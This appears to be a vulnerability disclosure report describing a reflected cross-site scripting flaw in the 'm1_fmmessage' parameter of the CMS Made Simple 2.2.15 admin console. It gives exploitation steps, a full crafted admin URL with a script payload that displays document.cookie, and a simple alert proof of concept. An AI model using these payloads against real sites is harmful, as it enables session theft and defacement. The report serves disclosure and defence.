Summary:
A Reflected cross-site scripting (XSS) in 'm1_fmmessage' parameter
Detailed Description:
Technical description:
A Reflected cross-site scripting (XSS) vulnerability in CMS Made Simple 2.2.15
exists in the admin console via the global parameters of 'm1_fmmessage'
parameter. Once the user completes an action, the page returns a link with
'm1_fmmessage' parameters this vulnerability allows an attacker to execute
JavaScript in the context of the victim's browser if the victim opens a
vulnerable page containing an XSS payload.lead to cookie stealing, defacement
and more.
on case Steps to exploit:
1) Navigate to http://www.cmsms.com/admin/moduleinterface.php and delete any
file in 'file manage'
2) Insert your payload in the response url "m1_fmmessages" parameter
such as:
http://www.cmsms.com/admin/moduleinterface.php?mact=FileManager,m1_,defaultadmin,0&__c=34f443492bff76e8334&m1_fileactiondelete=&m1_path=%2Fuploads%2Fimages&m1_selall=a%3A1%3A%7Bi%3A0%3Bs%3A76%3A%22OGU0ODI3MjgzMDQxMjA3MjAzM2I3MDI3YjJhMDMzMTkzMmIwODkyMnx4c3NwYXlsb2FkLnR4dA%3D%3D%22%3B%7D&m1_submit=Delete&m1_fmmessage=deletesuccess<ScRiPt>alert(document.cookie)</ScRiPt>
3) Refresh the page
Proof of concept (Poc):
The following payload will allow you to run the javascript :
<ScRiPt>alert(1)</ScRiPt>